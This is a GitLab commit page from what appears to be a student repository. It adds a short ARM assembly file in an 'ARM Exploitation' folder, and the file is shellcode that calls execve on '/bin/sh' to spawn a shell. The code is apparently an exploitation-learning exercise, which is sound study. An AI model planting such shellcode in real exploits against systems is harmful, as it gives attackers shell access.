Toggle navigation
Toggle navigation
This project
Loading...
Sign in
손지언
/
2019102185
Go to a project
Toggle navigation
Toggle navigation pinning
Projects
Groups
Snippets
Help
Project
Activity
Repository
Graphs
Network
Create a new issue
Commits
Issue Boards
Authored by
손지언
2022-02-18 05:00:40 +0000
Browse Files
Options
Browse Files
Download
Plain Diff
Commit
41bda5b289456b11c8e18486a37d9867f8f5da52
41bda5b2
2 parents
986936e6
3b3bd912
Merge branch 'master' of
http://khuhub.khu.ac.kr/2019102185/OSSPractice
tlqkf!!
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
11 additions
and
0 deletions
ARM Exploitation/execve1.s
ARM Exploitation/execve1.s
0 → 100644
View file @
41bda5b
1
+
.section .text
2
+
.global _start
3
+
4
+
_start:
5
+
add r0, pc, #12
6
+
mov r1, #0
7
+
mov r2, #0
8
+
mov r7, #11
9
+
svc #0
10
+
11
+
.ascii "/bin/sh\0"
...
\ No newline at end of file
...
\ No newline at end of file
Please
register
or
login
to post a comment